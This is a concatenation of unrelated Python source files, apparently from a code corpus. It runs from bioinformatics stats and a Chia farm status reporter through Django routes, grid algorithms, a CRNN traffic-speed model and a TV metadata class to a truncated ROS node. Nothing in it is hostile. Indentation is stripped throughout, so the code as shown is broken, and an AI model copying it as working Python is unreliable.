return '({} - {})'.format(*list(map(int,np.quantile(resamp,ci))))
def clusterStats(motifCounts,clusterIdx,outColumns,
aggFuncs=[np.median,np.mean],
randomSeed=None,ci=DEFAULTCI):
'''
motifCounts: df with cols = motif (+length), index = readnames
clusterIdx: vector of cluster indices, same order as motifCounts.index
outColumns: list of column names to describe in output
aggFuncs: list of functions to apply to each column
randomSeed: random seed for resampling ci
'''
clusters = motifCounts.groupby(clusterIdx)
clusterSize = clusters.size().rename(('Read','count'))
#set random seed
np.random.seed(randomSeed)
results = clusters[outColumns].agg(aggFuncs+[resampleCI])\
.join(clusterSize)\
.sort_values(('totalBp','median'))\
.reset_index(drop=True)
#rename clusters
names = clusterSize.reset_index().apply(clusterName,axis=1)
results.index = names.values
#rename column
name = 'ci%i' % int(100*(ci[1]-ci[0]))
results.rename(columns={'resampleCI':name},level=1,inplace=True)
return names,results
|
#
# Performs a REST call to controller (possibly localhost) of latest farm status.
#
import datetime
import http
import json
import os
import requests
import socket
import sqlite3
import traceback
from flask import g
from common.config import globals
from api.commands import chia_cli, chiadog_cli, plotman_cli
from api import app
from api import utils
def update():
with app.app_context():
try:
hostname = utils.get_hostname()
displayname = utils.get_displayname()
config = globals.load()
payload = {
"hostname": hostname,
"displayname": displayname,
"mode": os.environ['mode'],
"services": gather_services_status(),
"url": utils.get_remote_url(),
"config": json.dumps(config),
}
utils.send_post('/workers/', payload, debug=False)
except:
app.logger.info("Failed to load and send worker status.")
app.logger.info(traceback.format_exc())
def gather_services_status():
gc = globals.load()
plotman_status = "disabled"
if gc['plotting_enabled']:
if plotman_cli.get_plotman_pid():
plotman_status = "running"
else:
plotman_status = "stopped"
archiver_status = "disabled"
if gc['archiving_enabled']:
if plotman_cli.get_archiver_pid():
archiver_status = "running"
else:
archiver_status = "stopped"
chia_farm_status = "disabled"
chiadog_status = "disabled"
if gc['farming_enabled']:
chia_farm_status = chia_cli.load_farm_summary('chia').status
if gc['farming_enabled'] or gc['harvesting_enabled']:
if chiadog_cli.get_chiadog_pid('chia'):
chiadog_status = "running"
else:
chiadog_status = "stopped"
flax_farm_status = "disabled"
flaxdog_status = "disabled"
if gc['farming_enabled'] and gc['flax_enabled']:
flax_farm_status = chia_cli.load_farm_summary('flax').status
if gc['flax_enabled'] and (gc['farming_enabled'] or gc['harvesting_enabled']):
if chiadog_cli.get_chiadog_pid('flax'):
flaxdog_status = "running"
else:
flaxdog_status = "stopped"
return json.dumps({
'plotman_status': plotman_status,
'archiver_status': archiver_status,
'chia_farm_status': chia_farm_status,
'chiadog_status': chiadog_status,
'flax_farm_status': flax_farm_status,
'flaxdog_status': flaxdog_status,
}) |
from django.urls import path
from rest_framework.urlpatterns import format_suffix_patterns
from customer.views import CustomersViewSet
customer_list = CustomersViewSet.as_view({
'get': 'list',
'post': 'create'
})
customer_detail = CustomersViewSet.as_view({
'get': 'retrieve',
'put': 'update',
'patch': 'partial_update',
'delete': 'destroy'
})
urlpatterns = format_suffix_patterns([
path('customers/', customer_list, name='customer-list'),
path('customers/<int:pk>/', customer_detail, name='customer-detail'),
]) |
import random
import itertools
import iterators
import readPuzzle
def borderGen(coords):
borders = []
for coord in coords:
neighbors = [neighbor for neighbor in gridNeighbors(coord, readPuzzle.rows, readPuzzle.cols)
if neighbor not in coords]
borders += (((r, c), coord) for (r, c) in neighbors)
return borders
# connectedSubgrids
# input: coords is a list of (row, col) co-ordinates defining the individual squares of a connected grid region.
# output: subgrids is a list of lists containing each connected subgrid of the original grid region.
# Note: This routine is not efficient. It runs in O(n 2^n)-time where n is the number of squares in the input.
def connectedSubgrids(coords, numSquares = None):
# Handle bad inputs.
if numSquares != None and len(coords) < numSquares:
return None
if isConnected(coords) == False:
return None
# Number of squares in the grid.
n = len(coords)
# Initialize the output.
subgrids = []
# An iterable for all binary strings of length n (with numSquares 1s).
# Each binary string will be used as an incidence vector for the subgrids.
# For example, (1,1,0,1) would represent the inclusion of squares 0,1,3.
if numSquares == None:
binaries = itertools.product([0,1], repeat=n)
else:
binaries = iterators.stcombos(n-numSquares, numSquares)
# Check each binary string incidence vector.
for binary in binaries:
# Create the subgrid described by the incidence vector.
subgrid = [coord for i, coord in enumerate(coords) if binary[i] == 1]
# Skip over the empty subgrid case (ie all zeros case).
if len(subgrid) == 0: continue
# If the subgrid is connected, then add it to the output list.
if isConnected(subgrid):
subgrids.append(subgrid)
# Return the valid subgrids.
return subgrids
# gridNeighbors
# input:
# output:
def gridNeighbors(coord, rows = None, cols = None):
r = coord[0]
c = coord[1]
neighbors = []
if r > 0: neighbors.append((r-1, c))
if rows == None or r < rows-1: neighbors.append((r+1, c))
if c > 0: neighbors.append((r, c-1))
if cols == None or c < cols-1: neighbors.append((r, c+1))
return neighbors
# isConnected
# input:
# output:
def isConnected(coords):
found = gridBFS(coords)
return found != None and len(found) == len(coords)
# gridBFS
# input:
# output:
def gridBFS(coords):
found = []
if len(coords) == 0: return
todo = [coords[0]]
while len(todo) > 0:
current = todo.pop(0)
neighbors = gridNeighbors(current)
discovered = [neighbor for neighbor in neighbors
if neighbor in coords and neighbor not in found and neighbor not in todo]
todo = todo + discovered
found.append(current)
return found
# randomCoords
# input:
# output:
# For testing purposes.
def randomCoords(rows, cols, num):
if num > rows*cols:
return None
coords = []
while len(coords) < num:
r = random.randint(0, rows-1)
c = random.randint(0, cols-1)
coord = (r, c)
if coord not in coords:
coords.append(coord)
return coords
if __name__ == "__main__":
# Sample grid.
grid = [(0,0), (0,1), (0,2), (1,0), (1,1), (1,2)]
# Print the grid.
print("Original grid squares")
print(grid)
# gen possible border cells/rooms
borders = borderGen(grid)
# Sample subgrids.
subgrids = connectedSubgrids(grid)
# Print each subgrid.
print("\nConnected subgrids")
for subgrid in subgrids:
print(subgrid)
# Sample subgrids.with specified number of squares.
subgrids = connectedSubgrids(grid, 3)
# Print each subgrid.
print("\nConnected subgrids with a specified number of squares")
for subgrid in subgrids:
print(subgrid)
|
import pandas as pd
from bs4 import BeautifulSoup
from src.helpers.consts import WINOGRAD_PT_HTML_SCHEMAS_FILE, MISSING_TRANSLATION_INDEXES
def join_content(item):
content = [it.strip().replace(' ', ' ') for it in item.text.split('\n') if it.strip() != '']
return content
def clean_tags_for_schema_and_snippet(item):
fonts = item.find_all('font')
for font in fonts:
if font is not None:
font.extract()
ol = item.find('ol')
ol.extract()
ps = item.find_all('p')
for p in ps:
p.extract()
return item
def get_schema_and_snippet_texts(item):
item = clean_tags_for_schema_and_snippet(item)
content = join_content(item)
texts = (' ').join(content).split('Trecho:')
schema = texts[0].replace(' ', ' ').strip()
snippet = texts[1].replace(' ', ' ').strip()
if not schema[-1] in ['.', '!', '?']:
schema += '.'
if snippet[-1] != schema[-1] and schema[:-1].split()[-1] == snippet.split()[-1]:
snippet += schema[-1]
return schema, snippet
def generate_df_from_html():
with open(WINOGRAD_PT_HTML_SCHEMAS_FILE, 'r') as f:
soup = BeautifulSoup(f, 'html5lib')
rows = []
for item in soup.find('ol').find_all('li', recursive=False):
pronoun = item.find('b').text.strip()
content = join_content(item)
correct_answer = content[-1].replace('Resposta Correta:', '').strip()[0]
substitution_a = content[-3]
substitution_b = content[-2]
schema, snippet = get_schema_and_snippet_texts(item)
translated = True
row = [schema, snippet, pronoun, correct_answer, substitution_a, substitution_b, translated]
rows.append(row)
df = pd.DataFrame(rows, columns=['schema', 'snippet', 'pronoun', 'correct_answer',
'substitution_a', 'substitution_b', 'translated'])
for index in MISSING_TRANSLATION_INDEXES:
df.loc[index, 'translated'] = False
return df
|
from util import *
from util import raiseNotDefined
import time, os
import traceback
try:
import boinc
_BOINC_ENABLED = True
except:
_BOINC_ENABLED = False
#######################
# Parts worth reading #
#######################
class Agent:
"""
An agent must define a getAction method, but may also define the
following methods which will be called if they exist:
def registerInitialState(self, state): # inspects the starting state
"""
def __init__(self, index=0):
self.index = index
def getAction(self, state):
"""
The Agent will receive a GameState (from either {pacman, capture, sonar}.py) and
must return an action from Directions.{North, South, East, West, Stop}
"""
raiseNotDefined()
|
from typing import Any, List, Optional
from src.domain.userManagment.userSchema import UserCreateSchema, UserDBSchema, UserUpdateSchema
class UserService:
def __init__(self, user_queries: Any):
self.__user_queries = user_queries
async def create_user(self, user: UserCreateSchema) -> UserDBSchema:
new_user = await self.__user_queries.create_user(user)
return UserDBSchema.from_orm(new_user)
async def list_users(self) -> List[UserDBSchema]:
users = await self.__user_queries.get_all_users()
users_schema = list(map(lambda x: UserDBSchema.from_orm(x), users))
return users_schema
async def get_user_by_id(self, user_id: int) -> Optional[UserDBSchema]:
user = await self.__user_queries.get_user_byid(user_id)
if user:
return UserDBSchema.from_orm(user)
else:
return None
async def update_user(self, user_id: int, new_user: UserUpdateSchema) -> UserDBSchema:
old_user = await self.__user_queries.get_user_byid(user_id)
user_updated = await self.__user_queries.update_user(old_user, new_user)
return UserDBSchema.from_orm(user_updated)
async def remove_user(self, user_id: int) -> UserDBSchema:
user_removed = await self.__user_queries.delete_user(user_id)
return UserDBSchema.from_orm(user_removed)
|
"""
Main program parser
"""
import textwrap
from argparse import ArgumentParser, RawTextHelpFormatter
from enum import Enum, unique
from nspawn.support.typing import enum_name_list
from nspawn import with_merge_parser
def attach_engine(parser:ArgumentParser):
required = parser.add_argument_group('required arguments')
required.add_argument(
"--script",
help="Provide script path",
required=True,
)
def attach_build(parser:ArgumentParser):
pass
@unique
class SetupAction(Enum):
update = 'update'
ensure = 'ensure'
desure = 'desure'
create = 'create'
delete = 'delete'
enable = 'enable'
disable = 'disable'
start = 'start'
stop = 'stop'
command = 'command'
nsenter = 'nsenter'
def attach_setup(parser:ArgumentParser):
# required = parser.add_argument_group('required setup arguments')
default = SetupAction.update.name
parser.add_argument(
"--action",
help=textwrap.dedent(
f"""\
Select setup action (default={default}):
update : perform 'desure' then 'ensure'
desure : perform sequence: 'stop', 'disable', 'delete'
ensure : perform sequence: 'create', 'enable', 'start'
create : create 'machine.service' file into /etc/systemd/system, perform 'command'
delete : delete 'machine.service' file from /etc/systemd/system
enable : enable 'machine.service'
disable: disalbe 'machine.service'
start : start 'machine.service'
stop : stop 'machine.service'
command: execute run/sh commands from setup.py
nsenter: enter 'machine.service' namespace
"""),
choices=enum_name_list(SetupAction),
default=default,
# required=True,
)
def engine_parser(prog:str) -> ArgumentParser:
parser = ArgumentParser(
prog=prog,
description=textwrap.dedent(
"""\
Containers with systemd-nspawn :: dsl script engine.
"""),
formatter_class=RawTextHelpFormatter,
)
return parser
def build_parser():
parser = engine_parser('nspawn-build')
with_merge_parser(parser)
attach_engine(parser)
attach_build(parser)
return parser
def setup_parser():
parser = engine_parser('nspawn-setup')
with_merge_parser(parser)
attach_engine(parser)
attach_setup(parser)
return parser
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
_/ _/ _/_/_/ _/ _/ _/_/_/
_/_/ _/ _/ _/ _/ _/
_/ _/ _/ _/ _/_/_/_/ _/
_/ _/_/ _/ _/ _/ _/
_/ _/ _/_/_/ _/ _/ _/_/_/
https://github.com/TW-NCHC/functionality-scenario-test-A-2018
This program can train a CRNN (convolutional recurrent neural network)
and provide web service for predicting
@author August Chao <AugustChao@narlabs.org.tw>
"""
from __future__ import print_function
import warnings
warnings.simplefilter(action="ignore",category=DeprecationWarning)
warnings.simplefilter(action="ignore",category=FutureWarning)
import logging
import dill as pickle
#from optparse import OptionParserf
from optparse import OptionParser
import time
import datetime
import os
import re
import subprocess
import numpy as np
import pandas as pd
import keras.backend as K
from tqdm import tqdm
from joblib import Parallel, delayed
from keras.models import Model
from keras.layers.recurrent import SimpleRNN, LSTM, GRU
#from keras.utils.training_utils import multi_gpu_model
from keras.utils import multi_gpu_model
from keras.optimizers import RMSprop
from keras.layers import MaxPooling2D, Conv2D, RepeatVector, LSTM, multiply, Permute
from keras.optimizers import Adam
from keras.layers.core import Dense, Activation, Dropout, Flatten
from keras.layers import Input
from keras.layers.wrappers import TimeDistributed
from keras.callbacks import EarlyStopping, ModelCheckpoint, CSVLogger
from keras.utils import np_utils
from keras.models import model_from_json
from keras.preprocessing.image import ImageDataGenerator, img_to_array, load_img
from sklearn.preprocessing import LabelBinarizer
from keras.layers.recurrent import LSTM
from keras.utils import to_categorical
from keras.layers import Bidirectional
import random
os.environ["JOBLIB_TEMP_FOLDER"]="./tmp" # see issue https://goo.gl/4YZJUH
os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"]="0"
from flask import Flask
app = Flask("NCHC_Visual_Speed")
def create_model(input_shape=(30, 120, 176, 1), rnn_units=128, cnn_units=32, num_gpu=1, nb_category=10):
# define our time-distributed setup
inp = Input(shape=input_shape)
x = TimeDistributed(Conv2D(cnn_units, (3, 3), padding='same', activation='relu'))(inp)
x = TimeDistributed(Conv2D(cnn_units, (3, 3), padding='same', activation='relu'))(x)
x = TimeDistributed(MaxPooling2D(pool_size=(2, 2)))(x)
x = Dropout(.5)(x)
x = TimeDistributed(Conv2D(cnn_units, (3, 3), padding='same', activation='relu'))(x)
x = TimeDistributed(Conv2D(cnn_units, (3, 3), padding='same', activation='relu'))(x)
x = TimeDistributed(MaxPooling2D(pool_size=(2, 2)))(x)
x = Dropout(.5)(x)
x = TimeDistributed(Flatten())(x)
#x = LSTM(rnn_units, return_sequences=True)(x)
x = GRU(units=rnn_units, return_sequences=True)(x)
x = Dropout(.5)(x)
x = TimeDistributed(Flatten())(x)
#x = LSTM(rnn_units, return_sequences=True)(x)
x = GRU(units=rnn_units, return_sequences=True)(x)
x = Dropout(.5)(x)
#x = LSTM(rnn_units, return_sequences=False)(x)
x = GRU(units=rnn_units, return_sequences=False)(x)
x = Dropout(.5)(x)
x = Dense(4, activation='softmax')(x)
opt_adm = Adam()
model = Model(inp, x)
if num_gpu > 1:
model = multi_gpu_model(model, gpus=num_gpu) # gpus
model.compile(optimizer=opt_adm, loss='categorical_crossentropy', metrics=['accuracy'])
#model.compile(optimizer=opt_adm, loss='sparse_categorical_crossentropy', metrics=['accuracy'])
model.summary()
print ("model paerms: %s"%model.count_params())
return model
def get_worker(mdir, fn):
with open("%s/%s"%(mdir, fn), 'r') as handle:
return pickle.load(handle)
#def rand_getDataSet(dataset_path = "./datasets", size=100):
def rand_getDataSet(dataset_path = "./datasets", epochs=20, batchsize=8, ds_count=100):
random.seed(9001)
r_file_no = int(random.randint(0,300))
count = 0
while count < epochs * int(ds_count/batchsize):
count += 1
fns = os.listdir(dataset_path)
np.random.shuffle(fns)
fns = fns[0:7]
all_datasets = Parallel(n_jobs=-1)(
delayed(get_worker)(dataset_path, fns[i]) for i in tqdm( range(len(fns)),
ascii=True,
desc="Loading DS", ) )
#all_data = getDataSet(dataset_path, data_size)
train_x = np.array([x for (x, y) in all_datasets])
pre_train_y = np.array([y for (x, y) in all_datasets])
a = np.array([60,80,90,100])
pre_train_y = np.concatenate((a, pre_train_y))
encoder = LabelBinarizer()
train_y = encoder.fit_transform(["%s" % (x) for x in pre_train_y])
train_y = np.delete(train_y, np.s_[0:4], axis=0)
yield (train_x, train_y)
def getDataSet(dataset_path = "./datasets", size=100):
fns = os.listdir(dataset_path)
np.random.shuffle(fns)
if int(size) > 0 :
fns = fns[:int(size)]
datasets = Parallel(n_jobs=-1)(
delayed(get_worker)(dataset_path, fns[i]) for i in tqdm( range(len(fns)),
ascii=True,
desc="Loading DS", ) )
return datasets
def train( dataset_path = "./datasets",
data_size = 100,
nb_epochs=2,
weight_path="./weights"):
#For Test data
all_data = getDataSet("./datasets/nfbCCTV-N1-N-90.01-M", data_size)
train_x = np.array([ x for (x,y) in all_data ])
pre_train_y = np.array([ y for (x,y) in all_data ])
print ("Test Speed(y) distributions: \n", "%s"%pd.Series(pre_train_y).value_counts())
encoder = LabelBinarizer()
train_y = encoder.fit_transform([ "%s"%(x) for x in pre_train_y])
print(train_y.shape)
#For valid_data
all_data_val = getDataSet("./datasets_val/nfbCCTV-N1-N-90.01-M", data_size)
train_x_val = np.array([ x for (x,y) in all_data_val ])
pre_train_y_val = np.array([ y for (x,y) in all_data_val ])
print ("Valid Speed(y) distributions: \n", "%s"%pd.Series(pre_train_y_val).value_counts())
encoder = LabelBinarizer()
train_y_val = encoder.fit_transform([ "%s"%(x) for x in pre_train_y_val])
print(train_y_val.shape)
np.random.seed(6813)
K.set_image_dim_ordering('tf')
batch_size = 8
print("--"*5, "=="*5, "Dataset Info", "=="*5, "--"*5)
print('X_train_raw shape:', train_x.shape)
print(train_x.shape[0], 'train samples')
print(len(train_y), 'test samples', train_y.shape)
# creates weight_path
if not os.path.isdir(weight_path):
subprocess.call(["mkdir", "-p", weight_path])
callbacks = [
ModelCheckpoint(filepath="%s/weights.{epoch:02d}-{acc:.4f}.hdf5"%(weight_path), save_best_only=True, monitor='acc', verbose=0),
CSVLogger(os.path.join(".", "training.log")),
]
m_model = create_model(input_shape=train_x.shape[1:], nb_category=train_y.shape[1], rnn_units=128, cnn_units=32, num_gpu=1)
#Updated for "fit_generator"
m_model.fit_generator(rand_getDataSet("./datasets/nfbCCTV-N1-N-90.01-M", nb_epochs,batch_size, int(len(train_y[0:]))), steps_per_epoch=int(len(train_y[0:])) / batch_size,
epochs=nb_epochs,
validation_data=rand_getDataSet("./datasets_val/nfbCCTV-N1-N-90.01-M", nb_epochs, batch_size, int(len(train_y[0:]))),
validation_steps=int(len(train_y_val[0:])) / batch_size, callbacks=callbacks)
# m_model.fit_generator(rand_getDataSet(dataset_path, 1), steps_per_epoch=320/8, epochs=nb_epochs)
#m_model.fit(train_x, train_y, batch_size=batch_size, epochs=nb_epochs, validation_split=0.1, shuffle=True, verbose=1, callbacks=callbacks)
#print("--"*5, "=="*5, "Model Results", "=="*5, "--"*5)
#scores = m_model.evaluate(train_x_val, trin_y_val, verbose=1)
#print("##Model %s: %.2f%%" % (m_model.metrics_names[1], scores[1]*100))
model_json = m_model.to_json()
model_fn = "%s/model.json"%(weight_path)
with open( model_fn, "w") as json_file:
json_file.write(model_json)
print("Model Saved: %s"%(model_fn))
encoder_fn = "%s/encoder.pkl"%(weight_path)
with open( encoder_fn, "w") as fp:
pickle.dump(encoder, fp)
print("Target Encoder Saved: %s"%(encoder_fn))
print("Model Weights are: \n", ",\n ".join(sorted(os.listdir(weight_path))))
def getImgFrmFn(fn, mdir):
return img_to_array(load_img("%s/%s"%(mdir, fn),
target_size=(120, 176),
grayscale=True,
interpolation="hamming" ))/255.
def getBestModel():
global _weight_path_
global _img_path_
try:
# load json and create model
json_file = open("%s/model.json"%(_weight_path_), 'r')
loaded_model_json = json_file.read()
json_file.close()
loaded_model = model_from_json(loaded_model_json)
except:
print("Error while loading model from directory: %s"%(_weight_path_))
return None
# load weights into new model
best_weight = .0
best_weight_fn = ""
for wfn in os.listdir(_weight_path_):
if re.search("hdf5$", wfn):
acc_val = float(wfn.split("-")[1].replace(".hdf5", ""))
if acc_val > best_weight:
best_weight = acc_val
best_weight_fn = wfn
print("Loading Best Acc-Model: %s"%(best_weight_fn))
loaded_model.load_weights(_weight_path_ + "/" + best_weight_fn)
return loaded_model
def predictor(weight_path="./weights", opath="./cctv_imgs", token = "nfbCCTV-N1-N-90.01-M"):
global _model_
DIR = "%s/%s"%(opath, token)
logging.info("Scanning image files in directory: %s"%(DIR))
all_images = sorted([ name for name in os.listdir(DIR) if os.path.isfile(os.path.join(DIR, name))], reverse=True)[:30]
last_img_time = datetime.datetime.fromtimestamp(float(all_images[0].replace(".jpg", ""))).strftime('%Y-%m-%d %H:%M:%S')
pre_set = Parallel(n_jobs=-1)(delayed(getImgFrmFn)(all_images[i], DIR) for i in tqdm( range(len(all_images)),
ascii=True,
desc="Loading IMGs", ) )
pre_set = np.array([pre_set])
print ("dataset for predicting: ",pre_set.shape)
res = _model_.predict(pre_set)
encoder_fn = "%s/encoder.pkl"%(weight_path)
with open( encoder_fn, "r") as fp:
encoder = pickle.load(fp)
return "Speed Predicting Result for (%s) is %s."%(last_img_time, encoder.inverse_transform(res)[0])
@app.route("/")
def getCurrentSpeed():
global _weight_path_
global _img_path_
start = time.time()
res = predictor(weight_path=_weight_path_, opath=_img_path_)
end = time.time()
print( "Model building time: %.4f seconds."%(end - start) )
return res
def main():
parser = OptionParser()
parser.add_option('-i', '--image_path', dest='img_path',
default="./cctv_imgs",
help='this path stores all cctv images, default="./cctv_imgs"')
parser.add_option('-w', '--weight_path', dest='weight_path',
default="./weights",
help='destination path for weights, default="./weights"')
parser.add_option('-d', '--datasets_path', dest='dataset_path',
default="./datasets",
help='destination path for pickled(dill) datasets, default="./datasets"')
parser.add_option('-e', '--epochs_num', dest='epochs_num',
default=20,
help='epochs_num for training, default=20')
parser.add_option('-l', '--lot_size', dest='lot_size',
default=0,
help='training data lot 0 for all, any number >0 will be limited to that size, default=0')
parser.add_option('-p', '--serve_port', dest='serve_port',
default=80,
help='python flask bind port for requesting model results, default=80')
parser.add_option('-a', '--address_ip', dest='address_ip',
default='172.17.0.2',
help='python flask bind ip address, default="172.17.0.2"')
parser.add_option('-t', '--cctv_token', dest='token',
default="nfbCCTV-N1-N-90.01-M",
help='token for cctvid in tisv xml, default="nfbCCTV-N1-N-90.01-M"')
parser.add_option('-s', '--is_serve', dest='isServe',
default=False, action="store_true",
help='picking best model weight to predict by latest 30 images. \n-i can define img_path for detecting new images, default=False')
(options, args) = parser.parse_args()
logging.basicConfig(level=logging.INFO)
if options.isServe:
print ("-"*5, "="*5, "SERVING MODEL", "="*5, "-"*5)
global _weight_path_
global _img_path_
global _model_
_weight_path_= options.weight_path
_img_path_ = options.img_path
_model_ = getBestModel()
app.run(host=options.address_ip, port=options.serve_port)
else:
print ("-"*5, "="*5, "TRAINING MODEL", "="*5, "-"*5)
start = time.time()
train( options.dataset_path + "/" + options.token,
data_size = options.lot_size,
nb_epochs=int(options.epochs_num),
weight_path=options.weight_path )
end = time.time()
print( "Model building time: %.4f seconds."%(end - start) )
if __name__ == "__main__":
main()
|
hpzl ={
'大型汽车':'//*[@id="vhpzl"]/option[1]',
'小型汽车':'//*[@id="vhpzl"]/option[2]',
'大型新能源汽车':'//*[@id="vhpzl"]/option[3]',
'小型新能源汽车':'//*[@id="vhpzl"]/option[4]',
'使馆汽车':'//*[@id="vhpzl"]/option[5]',
'领馆汽车':'//*[@id="vhpzl"]/option[6]',
'境外汽车':'//*[@id="vhpzl"]/option[7]',
'外籍汽车':'//*[@id="vhpzl"]/option[8]',
'普通摩托车':'//*[@id="vhpzl"]/option[9]',
'轻便摩托车':'//*[@id="vhpzl"]/option[10]',
'使馆摩托车':'//*[@id="vhpzl"]/option[11]',
'领馆摩托车':'//*[@id="vhpzl"]/option[12]',
'境外摩托车':'//*[@id="vhpzl"]/option[13]',
'外籍摩托车':'//*[@id="vhpzl"]/option[14]',
'低速车':'//*[@id="vhpzl"]/option[15]',
'拖拉机':'//*[@id="vhpzl"]/option[16]',
'挂车':'//*[@id="vhpzl"]/option[17]',
'教练汽车':'//*[@id="vhpzl"]/option[18]',
'教练摩托车':'//*[@id="vhpzl"]/option[19]',
'试验汽车':'//*[@id="vhpzl"]/option[20]',
'试验摩托车':'//*[@id="vhpzl"]/option[21]',
'临时入境汽车':'//*[@id="vhpzl"]/option[22]',
'临时入境摩托车':'//*[@id="vhpzl"]/option[23]',
'临时行驶车':'//*[@id="vhpzl"]/option[24]',
'警用汽车':'//*[@id="vhpzl"]/option[25]',
'警用摩托':'//*[@id="vhpzl"]/option[26]',
'原农机号牌':'//*[@id="vhpzl"]/option[27]',
'香港入出境车':'//*[@id="vhpzl"]/option[28]',
'澳门入出境车':'//*[@id="vhpzl"]/option[29]',
}
city = {
'京':'bj',
'津':'tj',
'冀':'he',
'晋':'sx',
'蒙':'nm',
'辽':'ln',
'吉':'jl',
'黑':'hl',
'沪':'sh',
'皖':'ah',
'闽':'fj',
'赣':'jx',
'鲁':'sd',
'豫':'ha',
'鄂':'hb',
'湘':'hn',
'粤':'gd',
'桂':'gx',
'琼':'hi',
'渝':'cq',
'川':'sc',
'贵':'gz',
'云':'yn',
'陕':'sn',
'甘':'gs',
'青':'qh',
'宁':'nx',
'新':'xj'
} |
#!/usr/bin/python
import multiprocessing
msjs = ["Hola", "Que tal?", "Chau"]
def enviar(conn, msjs):
for msj in msjs:
conn.send(msj)
conn.close()
def recibir(conn):
while 1:
msj = conn.recv()
if msj == "Chau":
break
print(msj)
padre_conn, hijo_conn = multiprocessing.Pipe()
p1 = multiprocessing.Process(target=enviar, args=(padre_conn, msjs))
p2 = multiprocessing.Process(target=recibir, args=(hijo_conn,))
p1.start()
p2.start()
p1.join()
p2.join()
|
from lib import *
from app import *
import pprint
class tvEpisode:
def __init__(self, serieData):
self.seriesTitle = None
self.seriesSeason = None
self.seriesEpisode = None
self.seriesEpisodeName = None
self.seriesDescription = None
self.seriesRating = None
self.seriesAirDate = None
self.seriesNetwork = None
self.seriesGenre = None
self.seriesImage = None
self.seriesCast = None
self.seriesImdbId = None
self.seriesGrouping = None
self.foundSeries = False
self._setTitle(serieData['series'])
if "season" in serieData and "episodeNumber" in serieData:
self._setSeason(serieData['season'])
self._setEpisode(serieData['episodeNumber'])
self._parseData()
def _parseData(self):
if self.seriesSeason is None:
return False
try:
tvdb = tvdb_api.Tvdb(banners=True)
title = self.getTitle()
series = tvdb[title]
season = int(self.getSeason())
episode = int(self.getEpisode())
self._setArtwork(series['_banners']['season']['season'], season, tvdb)
self._setTitle(series['seriesname'])
self._setEpisodeName(series[season][episode]['episodename'])
self._setEpisodeDescription(series[season][episode]['overview'])
self._setAirDate(series[season][episode]['firstaired'])
self._setNetwork(series['network'])
self._setGenre(series['genre'])
self._setRating(series['contentrating'])
self._setCast(series['actors'])
self._setImdbId(series['imdb_id'])
self.foundSeries = True
except UnicodeEncodeError:
import sys, pdb
pdb.post_mortem(sys.exc_info()[2])
except:
import sys
print "TheTVDB failed by unexpected error:", sys.exc_info()[0]
print "Try TVRage instead"
return self._useTVRage()
def _useTVRage(self):
title = self.getTitle()
season = int(self.getSeason())
episode = int(self.getEpisode())
tvr = tvrage.api.Show(title)
seasonData = tvr.season(season).episode(episode)
self._setTitle(tvr.name)
self._setEpisodeName(seasonData.title)
self._setAirDate(seasonData.airdate)
self._setGenre("'" + ",".join(tvr.genres) + "'")
self._setGrouping('TVRage')
self.foundSeries = True
""""
self._setArtwork(series['_banners']['season']['season'], season, tvdb)
"""
return True
def _setTitle(self, title):
if title is not None:
title = self._optimizeTitleForSearch(title)
self.seriesTitle = str(title).encode('utf-8').strip()
def _setSeason(self, season):
if season is not None:
self.seriesSeason = str(season).encode('utf-8').strip()
def _setEpisode(self, episode):
if episode is not None:
self.seriesEpisode = str(episode).encode('utf-8').strip()
def _setEpisodeName(self, episodeName):
if episodeName is not None:
self.seriesEpisodeName = str(episodeName).encode('utf-8').strip()
def _setEpisodeDescription(self, episodeDescription):
if episodeDescription is not None:
self.seriesDescription = episodeDescription.strip()
def _setAirDate(self, airdate):
if airdate is not None:
self.seriesAirDate = str(airdate).encode('utf-8').strip()
def _setNetwork(self, network):
if network is not None:
self.seriesNetwork = str(network).encode('utf-8').strip()
def _setGenre(self, genre):
if genre is not None:
genre = (genre)[1:len(genre)]
self.seriesGenre = genre[0:genre.find("|")].encode('utf-8').strip()
def _setRating(self, rating):
if rating is not None:
self.seriesRating = rating.encode('utf-8').strip()
def _setCast(self, cast):
if cast is not None:
self.seriesCast = ",".join(cast.split('|'))
def _setImdbId(self, imdbId):
if imdbId is not None:
self.seriesImdbId = imdbId.strip()
def _setArtwork(self, banners, season, tvdb):
for s in banners:
artwork = tvdb[self.getTitle()]['_banners']['season']['season'][s]
if artwork['language'] == "en" and int(artwork['season']) == season:
self.seriesImage = artwork['_bannerpath']
break
def _setGrouping(self, text):
if text is not None:
self.seriesGrouping = text.strip()
def getTitle(self):
if self.seriesTitle is not None:
return self.seriesTitle
else:
return "Unknown"
def getTitleClean(self):
_title = self.getTitle()
if _title.find('Revolution.') != -1:
title = _title[:-5]
elif _title.find('Archer') != -1:
title = _title[0:6]
elif _title.find('Touch') != -1:
title = _title[0:5]
else:
title = _title
return title
def getSeason(self):
if self.seriesSeason is not None:
return self.seriesSeason
else:
return ""
def getEpisode(self):
if self.seriesEpisode is not None:
return self.seriesEpisode
else:
return ""
def getEpisodeName(self):
if self.seriesEpisodeName is not None:
return self.seriesEpisodeName
else:
return ""
def getDescription(self):
if self.seriesDescription is not None:
return self.seriesDescription
else:
return ""
def getRating(self):
if self.seriesRating is not None:
return self.seriesRating
else:
return ""
def getGenre(self):
if self.seriesGenre is not None:
return self.seriesGenre
else:
return ""
def getImage(self):
if self.seriesImage is not None:
return self.seriesImage
else:
return ""
def getNetwork(self):
if self.seriesNetwork is not None:
return self.seriesNetwork
else:
return ""
def getAirdate(self):
if self.seriesAirDate is not None:
return self.seriesAirDate
else:
return ""
def getCast(self):
if self.seriesCast is not None:
return self.seriesCast
else:
return ""
def getImdbId(self):
if self.seriesImdbId is not None:
return self.seriesImdbId
else:
return ""
def getGrouping(self):
if self.seriesGrouping is not None:
return self.seriesGrouping
else:
return ""
def _optimizeTitleForSearch(self, title):
_title = title
if _title.find('Archer') != -1:
title = title + " (2009)"
if _title.find('Touch') != -1:
title = title + " (2012)"
else:
title = _title
return title
|
#!/usr/bin/env python
import rospy
import roslib
import rostopic
import gdp
import pickle
import zlib
import sys
import argparse
from threading import Lock
from std_msgs.msg import String, Float64
from rospy.msg import AnyMsg
def _parse_args():
"""returns arguments passed to this node"""
# setup argument parsing. These could be either passed on
# command line (when invoking directly), or via a .launch file
# when using roslaunch
parser = argparse.ArgumentParser()
parser.add_argument("--preserve", action="store_true", help="Preserve "
"the topic names as is. Default False")
